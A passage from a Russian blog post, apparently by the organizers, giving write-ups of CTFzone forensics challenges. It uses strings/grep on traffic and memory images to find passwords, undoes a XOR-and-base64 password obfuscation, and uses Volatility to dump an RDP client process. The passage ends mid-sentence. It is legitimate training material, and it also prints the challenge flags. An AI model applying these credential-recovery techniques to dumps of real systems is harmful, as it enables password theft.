{"id":281495,"date":"2016-11-24T15:40:05","date_gmt":"2016-11-24T12:40:04","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=281495"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=281495","title":{"rendered":"CTFzone write-ups \u2013 First comes Forensics"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/4cb\/e22\/f87\/4cbe22f87a914e519e22fcf96b1b3a01.jpg\"\/><\/p>\n<p>  \u041f\u0440\u043e\u0448\u043b\u043e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u043d\u0435\u0439 \u043f\u043e\u0441\u043b\u0435 \u043e\u043a\u043e\u043d\u0447\u0430\u043d\u0438\u044f CTFzone \u043e\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 BI.ZONE, \u0430 \u043d\u0430\u0448\u0438 \u0441\u043c\u0430\u0440\u0442\u0444\u043e\u043d\u044b \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0440\u0430\u0437\u0440\u044b\u0432\u0430\u044e\u0442\u0441\u044f \u043e\u0442 \u0443\u0432\u0435\u0434\u043e\u043c\u043b\u0435\u043d\u0438\u0439 Telegram \u2013 \u0447\u0430\u0442 \u0441 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0430\u043c\u0438 \u0431\u0438\u0442\u0432\u044b \u043f\u043e\u0441\u043b\u0435 \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0438 \u0441\u0442\u0430\u043b \u0435\u0449\u0435 \u0431\u043e\u043b\u0435\u0435 \u043e\u0436\u0438\u0432\u043b\u0435\u043d\u043d\u044b\u043c. \u041f\u043e \u043e\u0442\u0437\u044b\u0432\u0430\u043c \u0438\u0433\u0440\u043e\u043a\u043e\u0432, \u043c\u043d\u043e\u0433\u0438\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u044f CTFzone \u0431\u044b\u043b\u0438 \u043e\u0447\u0435\u043d\u044c \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u043c\u0438 \u0438 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043d\u0435\u043f\u0440\u043e\u0441\u0442\u044b\u043c\u0438. \u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0441\u043e\u0440\u0435\u0432\u043d\u043e\u0432\u0430\u043d\u0438\u044f \u043c\u044b \u043f\u043e\u043e\u0431\u0435\u0449\u0430\u043b\u0438 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0430\u043c, \u0447\u0442\u043e, \u043a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430\u0448\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043e\u0442\u043e\u0441\u043f\u044f\u0442\u0441\u044f \u0438 \u043f\u0440\u0438\u0434\u0443\u0442 \u0432 \u0441\u0435\u0431\u044f, \u043c\u044b \u0432\u044b\u043b\u043e\u0436\u0438\u043c \u0440\u0430\u0439\u0442\u0430\u043f\u044b \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u0437\u0430\u0434\u0430\u043d\u0438\u0439 \u0432 \u043d\u0430\u0448\u0435\u043c \u0431\u043b\u043e\u0433\u0435. <\/p>\n<p>  \u041d\u0430\u0447\u043d\u0435\u043c \u043c\u044b \u0441 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Forensics, \u0438 \u0432 \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c \u0432\u0430\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043d\u0430 \u0432\u0441\u0435 \u0442\u0430\u0441\u043a\u0438 \u2013 \u043e\u0442 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u043d\u0430 50 \u0434\u043e 1000. \u041c\u044b \u0437\u043d\u0430\u0435\u043c, \u0447\u0442\u043e <a href=\"https:\/\/habrahabr.ru\/users\/hackzard\/\" class=\"user_link\">hackzard<\/a> \u043e\u043f\u0435\u0440\u0435\u0434\u0438\u043b \u043d\u0430\u0441 \u0438 \u0443\u0436\u0435 \u0432\u044b\u043b\u043e\u0436\u0438\u043b \u0440\u0430\u0439\u0442\u0430\u043f\u044b \u043a \u0437\u0430\u0434\u0430\u043d\u0438\u044f\u043c \u043d\u0430 50 \u0438 100, \u043d\u043e \u0441 \u0431\u043e\u043b\u0435\u0435 \u043a\u0440\u0443\u0442\u044b\u043c\u0438 \u0442\u0430\u0441\u043a\u0430\u043c\u0438 \u0431\u0443\u0434\u0435\u0442 \u0441\u043b\u043e\u0436\u043d\u0435\u0435 \ud83d\ude09<\/p>\n<p>  <a name=\"habracut\"><\/a><br \/>  <font color=\"#6495ED\"><b><\/p>\n<h4>Forensics 50 \u2014 PCAP master<\/h4>\n<p><\/b><\/font>  <\/p>\n<blockquote><p><i> <b>A.U.R.O.R.A.:<\/b> Lieutenant, how do you read me? You\u2019ve intercepted the traffic between the command server and the pilot\u2019s computer. Try to get the password from this traffic.<\/i><\/p><\/blockquote>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/a06\/211\/e00\/a06211e0066240a48db2d50bc4f9b95c.png\"\/><\/p>\n<p>  <b>\u0420\u0435\u0448\u0435\u043d\u0438\u0435:<\/b><\/p>\n<p>  \u0412 \u044d\u0442\u043e\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0438 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0443 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0441\u044f PCAP \u0434\u0430\u043c\u043f \u0442\u0440\u0430\u0444\u0438\u043a\u0430.<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/713\/a92\/c35\/713a92c3528c46f2ba3a9f7c3bd66c4e.png\"\/><\/p>\n<p>  \u041a\u0430\u043a \u0432\u044b \u0443\u0436\u0435 \u043f\u043e\u043d\u044f\u043b\u0438, \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u0431\u044b\u043b\u043e \u043e\u0447\u0435\u043d\u044c \u043f\u0440\u043e\u0441\u0442\u044b\u043c, \u0438 \u0435\u0433\u043e \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0440\u0435\u0448\u0438\u0442\u044c \u0432 \u043e\u0434\u043d\u0443 \u0441\u0442\u0440\u043e\u043a\u0443:<\/p>\n<p>  \u041a\u043e\u043c\u0430\u043d\u0434\u0430:   <\/p>\n<pre><code class=\"bash\">strings -t x task_forensics_50.pcap | grep &quot;pass&quot; <\/code><\/pre>\n<p>  \u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:  <\/p>\n<pre><code class=\"bash\">7e6 GET \/?pass=ctfzone{b1@ckduck} HTTP\/1.1 <\/code><\/pre>\n<p>  <b>\u041e\u0442\u0432\u0435\u0442:<\/b> <i>ctfzone{b1@ckduck}<\/i><\/p>\n<p>  <font color=\"#6495ED\"><b><\/p>\n<h4>Forensics 100 \u2014 Master of Strings<\/h4>\n<p><\/b><\/font>  <\/p>\n<blockquote><p><i><b>A.U.R.O.R.A.:<\/b> Rise and shine, Lieutenant, stop dreaming of drinking vodka and playing with the bear. A.U.R.O.R.A. is speaking and it\u2019s time you stopped sleeping at your workplace. You can\u2019t idle your time anymore as the whole world might go down the drain unless, well\u2026 Let&#8217;s say it\u2019s time you are back in the game. The right man in the wrong place can change the world. So wake up, Lieutenant, find a password for the Spaceship panel and join the forces on Earth!<\/i><\/p><\/blockquote>\n<p>  \u0423\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0443 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0431\u0440\u0430\u0437 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0441\u043d\u044f\u0442 \u0432 \u043c\u043e\u043c\u0435\u043d\u0442 \u0432\u0445\u043e\u0434\u0430 \u0432 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c\u043d\u0443\u044e \u043f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u0441\u043c\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u043a\u043e\u0440\u0430\u0431\u043b\u0435\u043c:<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/c90\/f23\/73e\/c90f2373ecde4557b799699d6c6f59d9.png\"\/><\/p>\n<p>  <b>\u0420\u0435\u0448\u0435\u043d\u0438\u0435:<\/b><\/p>\n<p>  \u0412 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0431\u044b\u043b\u043e \u0438\u0437\u0432\u043b\u0435\u0447\u044c \u0432\u0441\u0435 \u0441\u0442\u0440\u043e\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442 \u00abpass=\u00bb.<\/p>\n<p>  \u041a\u043e\u043c\u0430\u043d\u0434\u0430:  <\/p>\n<pre><code class=\"bash\">strings -t x task_forensics_100.ram | grep --color &quot;pass=&quot; <\/code><\/pre>\n<p>  \u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">94e1fa0 trovich&pass=LhUBEwwlAAJZIhQmGwYYAAF5MA%3D%3D 1082e5c5   &lt;settings pass=&quot;windowsPE&quot; wasPassProcessed=&quot;true&quot;&gt; 127c5776             pass=&quot;specialize&quot;\/&gt; 155c83e8 login=Petrovich&pass=LhUBEwwlAAJZIhQmGwYYAAF5MA%3D%3D 155c8828 login=Petrovich&pass=LhUBEwwlAAJZIhQmGwYYAAF5MA%3D%3D 194c7e58 &lt;settings pass=&quot; 1e11d387 login=Petrovich&pass=LhUBEwwlAAJZIhQmGwYYAAF5MA%3D%3D <\/code><\/pre>\n<\/div>\n<\/div>\n<p>  \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u0430\u0440\u043e\u043b\u044c \u00abLhUBEwwlAAJZIhQmGwYYAAF5MA%3D%3D\u0441\u00bb, \u043d\u043e \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043e\u043d \u0447\u0435\u043c-\u0442\u043e \u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u043d (base64 \u0441\u0440\u0430\u0437\u0443 \u0432\u0438\u0434\u043d\u043e). \u0414\u0430\u043b\u0435\u0435 \u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043b\u043e \u043d\u0430\u0439\u0442\u0438 \u0441\u0442\u0440\u0430\u043d\u0438\u0447\u043a\u0443 \u043f\u0430\u043d\u0435\u043b\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0441\u0442\u0430\u043b\u0430\u0441\u044c \u0432 \u043f\u0430\u043c\u044f\u0442\u0438:<\/p>\n<p>  \u041a\u043e\u043c\u0430\u043d\u0434\u0430:  <\/p>\n<pre><code class=\"bash\">strings -t x task_forensics_100.ram | grep --color &quot;&lt;html&gt;&quot; <\/code><\/pre>\n<p>  \u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:  <\/p>\n<pre><code class=\"bash\">12f8240 &lt;html&gt; 9bff780 &lt;html&gt; 16934d20 &lt;html&gt; 1b8ff4bd &lt;html&gt; 1bc5c2c8 &lt;html&gt; 1ed8f145 &lt;html&gt; <\/code><\/pre>\n<p>  \u0415\u0441\u043b\u0438 \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u044c\u0441\u044f \u043f\u043e \u0441\u043c\u0435\u0449\u0435\u043d\u0438\u044e \u00ab12f8240\u00bb, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c html-\u0441\u0442\u0440\u0430\u043d\u0438\u0447\u043a\u0443:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">&lt;html&gt; &lt;head&gt;&lt;title&gt;Spaceship Panel&lt;\/title&gt;&lt;\/head&gt;   &lt;style&gt;    body { \tbackground-color: #2A191E;  \tbackground-image: url(bd.png);  \tbackground-repeat: no-repeat;  \tbackground-size: 100%;     }    form { \twidth: 300px; \tmargin: 0 auto;     }    &lt;\/style&gt;  &lt;script language=&quot;javascript&quot; type=&quot;text\/javascript&quot;&gt;  function Magic(beard,water) {     var ord = []     var buf = &quot;&quot;      for (z = 1; z &lt;= 255; z++) {ord[String.fromCharCode(z)] = z}      for (j = z = 0; z &lt; beard.length; z++) {         buf += String.fromCharCode(ord[beard.substr(z, 1)] ^ ord[water.substr(j, 1)])         j = (j &lt; water.length) ? j + 1 : 0} return buf }  function b64EncodeUnicode(str) {  return btoa(encodeURIComponent(str).replace(\/%([0-9A-F]{2})\/g, function(match, p1) {   return String.fromCharCode('0x' + p1);}));}  function doLogin(){ \t$a = document.myform.pass.value; \tdocument.myform.pass.value = b64EncodeUnicode(Magic($a,&quot;MagicKey&quot;)); \tdocument.myform.submit(); } &lt;\/script&gt; &lt;\/head&gt; &lt;body&gt; &lt;center&gt; &lt;div class=&quot;center&quot;&gt;  &lt;form name = 'myform' action = '#' method = 'post'&gt;   &lt;input id=&quot;login&quot; name = &quot;login&quot; placeholder=&quot;Login&quot; \/&gt;&lt;br&gt;   &lt;input id=&quot;pass&quot; name = &quot;pass&quot; placeholder=&quot;Password&quot; \/&gt;&lt;br&gt;   &lt;input onClick=&quot;doLogin(); return true;&quot; type=&quot;submit&quot; value=&quot;Login&quot;&gt; &lt;\/div&gt; &lt;\/center&gt; &lt;\/body&gt; &lt;\/html&gt; <\/code><\/pre>\n<\/div>\n<\/div>\n<p>  \u0418\u0437 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b \u0432\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u043f\u0435\u0440\u0435\u0434 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u043e\u0439 \u043f\u0430\u0440\u043e\u043b\u044f \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u0435\u0439 Magic(beard,water), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u044e XOR \u043d\u0430 \u0431\u0430\u0437\u0435 \u043a\u043b\u044e\u0447\u0430 \u00abMagicKey\u00bb, \u0430 \u0434\u0430\u043b\u0435\u0435 \u0438\u0434\u0435\u0442 \u043f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0432 base64. \u0414\u0430\u043b\u0435\u0435 \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u0435\u043c \u043f\u0430\u0440\u043e\u043b\u044c \u00abLhUBEwwlAAJZIhQmGwYYAAF5MA==\u00bb:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">&lt;html&gt; &lt;script language=&quot;javascript&quot; type=&quot;text\/javascript&quot;&gt;  function Magic(beard,water) {     var ord = []     var buf = &quot;&quot;      for (z = 1; z &lt;= 255; z++) {ord[String.fromCharCode(z)] = z}      for (j = z = 0; z &lt; beard.length; z++) {         buf += String.fromCharCode(ord[beard.substr(z, 1)] ^ ord[water.substr(j, 1)])         j = (j &lt; water.length) ? j + 1 : 0} return buf }  function b64DecodeUnicode(str) {  return decodeURIComponent(Array.prototype.map.call(atob(str), function(c) {   return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);}).join(''));}  var goo = Magic(b64DecodeUnicode(&quot;LhUBEwwlAAJZIhQmGwYYAAF5MA==&quot;), &quot;MagicKey&quot;); alert(goo); &lt;\/script&gt; &lt;\/html&gt; <\/code><\/pre>\n<\/div>\n<\/div>\n<p>  \u0417\u0430\u0434\u0430\u043d\u0438\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u043e \u0447\u0438\u0442 (\u0441\u043f\u0430\u0441\u0438\u0431\u043e <a href=\"https:\/\/habrahabr.ru\/users\/hackzard\/\" class=\"user_link\">hackzard<\/a>), \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u044b \u00abstrings.exe\u00bb \u0438\u0437 sysinternals.<\/p>\n<p>  <b>\u041e\u0442\u0432\u0435\u0442:<\/b> <i>ctfzone{YouAreSexy}<\/i><\/p>\n<p>  <font color=\"#6495ED\"><b><\/p>\n<h4>Forensics 300 \u2014 Unlock Your Mind Power<\/h4>\n<p><\/b><\/font>  <\/p>\n<blockquote><p><i><b>A.U.R.O.R.A.:<\/b> Lieutenant, looks like you are locked in the room. You don\u2019t want to stay here forever, do you? In order to open the door you should enter the code which was used to lock it. I\u2019ll give you a clue \u2014 you see a terminal over there? There is a diary next to the terminal which belongs to astronaut Nyota. It says that the door is connected to the control console. After Varvara locked the door, service engineer tinkered with this terminal. Examine this terminal and find a memory dump which may help you to find the right code. Good luck, Lieutenant, see you on the other side!<\/i><\/p><\/blockquote>\n<p>  <b>\u0420\u0435\u0448\u0435\u043d\u0438\u0435:<\/b><\/p>\n<p>  \u0423\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0443 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0431\u0440\u0430\u0437 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438. \u0420\u0435\u0448\u0435\u043d\u0438\u0435 \u0437\u0430\u0434\u0430\u0447\u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u043d\u0430\u0447\u0430\u0442\u044c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u044b \u00abVolatility Forensics\u00bb, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432:<\/p>\n<pre><code class=\"bash\">.\/vol.py -f task_forensics_300\/MEMORY.DMP --profile=Win7SP1x86 pslist <\/code><\/pre>\n<p>  \u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                           ---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------ 0x851c9020 System                    4      0     81      529 ------      0 2016-11-09 13:40:52 UTC+0000                                  0x865a7ae0 smss.exe                240      4      2       29 ------      0 2016-11-09 13:40:52 UTC+0000                                  0x86c474c8 csrss.exe               328    320      9      474      0      0 2016-11-09 13:41:00 UTC+0000                                  0x86e1fd40 csrss.exe               368    360      9      226      1      0 2016-11-09 13:41:03 UTC+0000                                  0x87029d40 wininit.exe             376    320      3       75      0      0 2016-11-09 13:41:03 UTC+0000                                  0x8704d2b8 winlogon.exe            412    360      6      113      1      0 2016-11-09 13:41:03 UTC+0000                                  0x870a8d40 services.exe            472    376      9      221      0      0 2016-11-09 13:41:04 UTC+0000                                  0x87090030 lsass.exe               496    376      8      645      0      0 2016-11-09 13:41:07 UTC+0000                                  0x87098d40 lsm.exe                 504    376     11      205      0      0 2016-11-09 13:41:07 UTC+0000                                  0x87104d40 svchost.exe             600    472     12      360      0      0 2016-11-09 13:41:07 UTC+0000                                  0x870cbb20 svchost.exe             668    472      7      271      0      0 2016-11-09 13:41:08 UTC+0000                                  0x871076c8 svchost.exe             720    472     20      452      0      0 2016-11-09 13:41:08 UTC+0000                                  0x871556c8 svchost.exe             824    472     19      442      0      0 2016-11-09 13:41:08 UTC+0000                                  0x87163b18 svchost.exe             852    472     37     1034      0      0 2016-11-09 13:41:08 UTC+0000                                  0x87173878 audiodg.exe             916    720      7      132      0      0 2016-11-09 13:41:09 UTC+0000                                  0x871a66c8 svchost.exe            1004    472     15      526      0      0 2016-11-09 13:41:09 UTC+0000                                  0x871c6030 svchost.exe            1112    472     23      519      0      0 2016-11-09 13:41:12 UTC+0000                                  0x871e4d40 spoolsv.exe            1228    472     13      319      0      0 2016-11-09 13:41:13 UTC+0000                                  0x87222d40 svchost.exe            1268    472     19      316      0      0 2016-11-09 13:41:13 UTC+0000                                  0x87270278 vmicsvc.exe            1364    472      8      106      0      0 2016-11-09 13:41:13 UTC+0000                                  0x87282558 vmicsvc.exe            1396    472      6      128      0      0 2016-11-09 13:41:13 UTC+0000                                  0x8729b030 vmicsvc.exe            1424    472      4       66      0      0 2016-11-09 13:41:13 UTC+0000                                  0x8729e4a0 vmicsvc.exe            1452    472      5       80      0      0 2016-11-09 13:41:13 UTC+0000                                  0x87287648 vmicsvc.exe            1476    472      5       81      0      0 2016-11-09 13:41:13 UTC+0000                                  0x872e68f0 taskhost.exe           1624    472      9      152      1      0 2016-11-09 13:41:14 UTC+0000                                  0x87311030 vmtoolsd.exe           1740    472     10      283      0      0 2016-11-09 13:41:15 UTC+0000                                  0x873176c8 dwm.exe                1816    824      6       71      1      0 2016-11-09 13:41:16 UTC+0000                                  <\/code><\/pre>\n<p>  <\/div>\n<\/div>\n<p>  \u0412 \u0441\u043f\u0438\u0441\u043a\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u0434\u0435\u043b\u0438\u0442\u044c \u00abmstsc.exe\u00bb \u2013 RDP \u043a\u043b\u0438\u0435\u043d\u0442 \u041e\u0421 \u00abWindows\u00bb. \u0421\u0434\u0435\u043b\u0430\u0435\u043c \u0434\u0430\u043c\u043f \u043f\u0430\u043c\u044f\u0442\u0438 \u044d\u0442\u043e\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 (\u0432\u0441\u0435\u0439 \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438, \u0430 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430):<\/p>\n<p>  \u041a\u043e\u043c\u0430\u043d\u0434\u0430:  <\/p>\n<pre><code class=\"bash\">.\/vol.py -f task_forensics_300\/MEMORY.DMP --profile=Win7SP1x86 memdump -p 2800 -D \/tmp\/<\/code><\/pre>\n<p>  \u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:  <\/p>\n<pre><code class=\"bash\">Writing mstsc.exe [  2800] to 2800.dmp<\/code><\/pre>\n<p>  \u0422\u0435\u043f\u0435\u0440\u044c \u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043b\u043e \u0431\u044b \u043f\u043e\u0438\u0441\u043a\u0430\u0442\u044c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 \u0432 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u043e\u043c \u0434\u0430\u043c\u043f\u0435, \u043d\u043e \u043d\u0438\u0447\u0435\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0433\u043e \u0438\u0437 \u0441\u0442\u0440\u043e\u043a \u0438\u0437\u0432\u043b\u0435\u0447\u044c \u043d\u0435 \u0443\u0434\u0430\u0441\u0442\u0441\u044f, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u0435\u0440\u0435\u0439\u0434\u0435\u043c \u0441\u0440\u0430\u0437\u0443 \u043a \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u043c\u0443 \u0448\u0430\u0433\u0443. \u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0443 \u0438\u0437 RDP \u0441\u0435\u0430\u043d\u0441\u0430. \u041f\u0440\u0438 \u043f\u043e\u0438\u0441\u043a\u0435 \u0432 google \u00abrdp image from memory\u00bb \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0439\u0442\u0438 \u0431\u043b\u043e\u0433 <a href=\"https:\/\/w00tsec.blogspot.ru\/2015\/02\/.html\">extracting raw pictures from memory<\/a>, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0438 \u0438\u0437 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 mstsc.exe c \u043f\u043e\u043c\u043e\u0449\u044c\u044e GIMP. \u0418\u0434\u0435\u044f \u043f\u0440\u043e\u0441\u0442\u0430 \u2013 mstsc.exe \u0445\u0440\u0430\u043d\u0438\u0442 \u0432 \u0441\u0432\u043e\u0435\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0443 (\u0432 RAW \u0444\u043e\u0440\u043c\u0430\u0442\u0435) \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0440\u0435\u0436\u0438\u043c\u0430 \u043f\u0440\u0435\u0434\u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0430 GIMP \u044d\u0442\u0443 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0443 \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c, \u043d\u043e \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043d\u0443\u0436\u043d\u043e \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043f\u043e\u0434\u043e\u0431\u0440\u0430\u0442\u044c \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0438, \u0438\u043d\u0430\u0447\u0435 \u043e\u043d\u0430 \u0431\u0443\u0434\u0435\u0442 \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u0442\u044c \u043a\u0430\u043a \u0448\u0443\u043c. \u041d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0438 \u0434\u043e\u043b\u0436\u043d\u043e \u0441\u043e\u0432\u043f\u0430\u0434\u0430\u0442\u044c \u0441 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0435\u043c \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0430, \u0430 \u0434\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b 